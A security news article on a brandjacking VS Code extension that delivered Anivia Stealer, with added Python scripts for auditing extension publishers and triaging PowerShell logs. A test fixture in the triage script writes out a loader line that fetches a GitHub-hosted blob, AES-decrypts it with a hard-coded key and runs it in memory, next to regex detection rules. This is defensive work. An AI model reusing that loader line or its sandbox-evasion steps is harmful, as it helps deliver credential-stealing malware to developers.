Malicious Prettier Extension on VSCode Marketplace Delivers Anivia Stealer Malware to Exfiltrate Login Credentials


A malware campaign targeted developers through a fake extension published on the Visual Studio Code Marketplace.

On November 21, 2025, security researchers discovered a malicious extension named “prettier-vscode-plus” designed to trick developers into installing it by mimicking the legitimate Prettier code formatter.

The extension traded on Prettier's brand recognition to reach developers searching the marketplace for a formatting tool.

The malicious extension operated as a brandjacking attack: it used a nearly identical name and appearance to the genuine Prettier extension to deceive users into installing it.

This type of attack is particularly effective because developers often trust popular extensions they recognize.
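To make that check concrete, here is a small audit script, added here as an example (it is not from the article or from Checkmarx), that reads installed extensions' package.json manifests and flags anything whose name or title carries a protected brand but whose publisher is not the official one. The publisher ID esbenp for the genuine "Prettier - Code formatter" is real; the sample manifests, including the publisher name fmt-tools-dev used for the fake extension, are constructed for the example, since the article does not name the malicious publisher.

```python
import json
from pathlib import Path

# Brand keyword -> publisher IDs allowed to ship an extension carrying that brand.
# "esbenp" publishes the genuine Prettier - Code formatter (extension ID
# esbenp.prettier-vscode). Extend the table for other brands you care about.
OFFICIAL_PUBLISHERS = {
    "prettier": {"esbenp"},
}

# Constructed manifests standing in for ~/.vscode/extensions/*/package.json.
# The publisher "fmt-tools-dev" is invented for this example.
SAMPLE_MANIFESTS = [
    {"name": "prettier-vscode", "displayName": "Prettier - Code formatter",
     "publisher": "esbenp", "version": "11.0.0"},
    {"name": "prettier-vscode-plus", "displayName": "Prettier+ Code Formatter",
     "publisher": "fmt-tools-dev", "version": "1.0.2"},
    {"name": "sample-theme", "displayName": "Sample Theme",
     "publisher": "example-publisher", "version": "0.1.0"},
]


def brand_of(manifest):
    """Return the protected brand this extension's name or title trades on, if any."""
    text = f"{manifest.get('name', '')} {manifest.get('displayName', '')}".lower()
    for brand in OFFICIAL_PUBLISHERS:
        if brand in text:
            return brand
    return None


def audit_manifests(manifests):
    """Flag extensions that carry a protected brand but come from an unlisted publisher."""
    findings = []
    for m in manifests:
        brand = brand_of(m)
        if brand is None:
            continue
        publisher = (m.get("publisher") or "").lower()
        if publisher not in OFFICIAL_PUBLISHERS[brand]:
            findings.append({
                "extension": f"{publisher}.{m.get('name', '')}",
                "version": m.get("version", ""),
                "brand": brand,
                "publisher": publisher,
            })
    return findings


def load_installed_manifests(extensions_dir=None):
    """Read every package.json under the VS Code extensions directory (default ~/.vscode/extensions)."""
    root = Path(extensions_dir) if extensions_dir else Path.home() / ".vscode" / "extensions"
    manifests = []
    for pkg in root.glob("*/package.json"):
        try:
            manifests.append(json.loads(pkg.read_text(encoding="utf-8")))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip rather than abort the audit
    return manifests


if __name__ == "__main__":
    for hit in audit_manifests(SAMPLE_MANIFESTS):
        print(f"REVIEW {hit['extension']} v{hit['version']}: carries brand '{hit['brand']}' "
              f"but publisher '{hit['publisher']}' is not an official {hit['brand']} publisher")
```

On a real workstation, pass load_installed_manifests() instead of SAMPLE_MANIFESTS. Treat a match as a prompt to check the publisher on the marketplace page, not as proof of malice: legitimate integrations from other publishers also carry the word "prettier" in their names.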

Checkmarx security researchers identified and reported the extension quickly, leading to its removal within four hours of publication.


Even in that window, the extension recorded six downloads and three installations before it was taken down.

Checkmarx security analysts identified that the extension deployed a variant of the Anivia Stealer malware, a credential-stealing tool designed to harvest sensitive information from Windows systems.

The malware specifically targeted login credentials, metadata, and private communications, including WhatsApp chats.

The objective was to compromise developer accounts by stealing the authentication data stored on their machines.

Multi-Stage Attack Infrastructure and Evasion Tactics

The malware used a multi-stage deployment process designed to evade common security tools. The first stage fetched the payload as a base64-encoded blob from a GitHub repository and wrote a VBScript file to the system's temporary directory for execution.

The VBS script served only as a bootstrap: it launched PowerShell commands that decrypted the blob in memory, without writing the result to disk, using a hard-coded AES key (AniviaCryptKey2024!32ByteKey!HXX). The key is 32 bytes, so this is AES-256, and because it is embedded in the loader, an analyst who captures the blob can decrypt it with the same key.

This approach significantly reduced detectable forensic artifacts, making the attack harder for endpoint security systems to track.

The final stage called the .NET Reflection.Assembly.Load method (from PowerShell, [Reflection.Assembly]::Load) to load the decrypted binary straight from memory, then invoked the entry point “Anivia.AniviaCRT” to start the stealer.

This technique left minimal evidence of infection: the VBScript in the temporary directory is the only notable disk artifact. The decrypted PowerShell is still visible to script block logging (event 4104) where that is enabled, which makes it a primary evidence source for this chain. The malware also implemented sandbox evasion, checking for small CPU counts and limited RAM to avoid running inside detonation chambers.
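The staging chain described above is visible to PowerShell script block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log) even though only the VBScript touches disk. The triage script below is an added example, not code from the article, from Checkmarx, or from the malware: the sample log entries are constructed to reproduce the behaviours the write-up names (GitHub fetch, Base64 decode, in-memory AES decryption, [Reflection.Assembly]::Load, CPU and RAM checks), the rule names and thresholds are my own, and the GetMethod('Main') call in the sample is an assumption about how the entry point is invoked.

```python
import re

# Constructed samples standing in for ScriptBlockText from PowerShell event 4104.
# They are NOT the real Anivia loader; they reproduce only the behaviours the
# write-up describes so that the rules have something to match.
SAMPLE_EVENTS = [
    {"id": 1, "text": "Get-ChildItem -Path C:\\Users\\dev\\project | Select-Object Name, Length"},
    {"id": 2, "text": (
        "$b = (Invoke-WebRequest 'https://raw.githubusercontent.com/example/repo/main/blob.txt').Content;"
        "$raw = [Convert]::FromBase64String($b);"
        "$aes = [System.Security.Cryptography.Aes]::Create();"
        "$aes.Key = [Text.Encoding]::UTF8.GetBytes('AniviaCryptKey2024!32ByteKey!HXX');"
        "$dec = $aes.CreateDecryptor().TransformFinalBlock($raw, 16, $raw.Length - 16);"
        "$asm = [Reflection.Assembly]::Load($dec);"
        "$asm.GetType('Anivia.AniviaCRT').GetMethod('Main').Invoke($null, $null)"  # assumed invocation
    )},
    {"id": 3, "text": (
        "$cs = Get-CimInstance Win32_ComputerSystem;"
        "if ($cs.NumberOfLogicalProcessors -lt 2 -or $cs.TotalPhysicalMemory -lt 2GB) { exit }"
    )},
    {"id": 4, "text": "Import-Module Pester; Invoke-Pester -Path .\\tests"},
]

# One rule per stage of the chain. Names and thresholds are my own choices.
RULES = {
    "github_raw_fetch": re.compile(r"raw\.githubusercontent\.com|github\.com/\S+?/raw/", re.I),
    "base64_decode":    re.compile(r"FromBase64String", re.I),
    "aes_in_memory":    re.compile(r"\bAes(CryptoServiceProvider|Managed)?\b.*?CreateDecryptor", re.I | re.S),
    "reflective_load":  re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\(", re.I),
    "sandbox_check":    re.compile(r"NumberOfLogicalProcessors|NumberOfProcessors|TotalPhysicalMemory", re.I),
    "anivia_key":       re.compile(re.escape("AniviaCryptKey2024!32ByteKey!HXX")),
}

# Rules that are damning on their own; the rest only matter in combination.
HIGH_ON_THEIR_OWN = {"reflective_load", "anivia_key"}


def score_event(text):
    """Return (sorted names of rules that matched, verdict) for one script block."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    if HIGH_ON_THEIR_OWN & set(hits):
        verdict = "high"
    elif len(hits) >= 2:
        verdict = "suspicious"
    elif hits:
        verdict = "low"
    else:
        verdict = "clean"
    return hits, verdict


def triage(events):
    """Score every event; returns one dict per input event, in input order."""
    results = []
    for ev in events:
        hits, verdict = score_event(ev["text"])
        results.append({"id": ev["id"], "hits": hits, "verdict": verdict})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        if r["verdict"] != "clean":
            print(f"event {r['id']}: {r['verdict']:<10} {', '.join(r['hits'])}")
```

To run this against real data, export ScriptBlockText from event ID 4104 (for example with Get-WinEvent on the Microsoft-Windows-PowerShell/Operational log) and feed each block in as the "text" field. A lone sandbox check scores low on purpose: plenty of legitimate scripts inspect CPU and memory, and the signal in this chain comes from the combination of stages, with the hard-coded key and the reflective load being the two that are conclusive by themselves.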

The design targets endpoint detection and response products specifically: the only on-disk artifact is a short VBScript, and the stealer itself never exists as a file on the victim's machine.
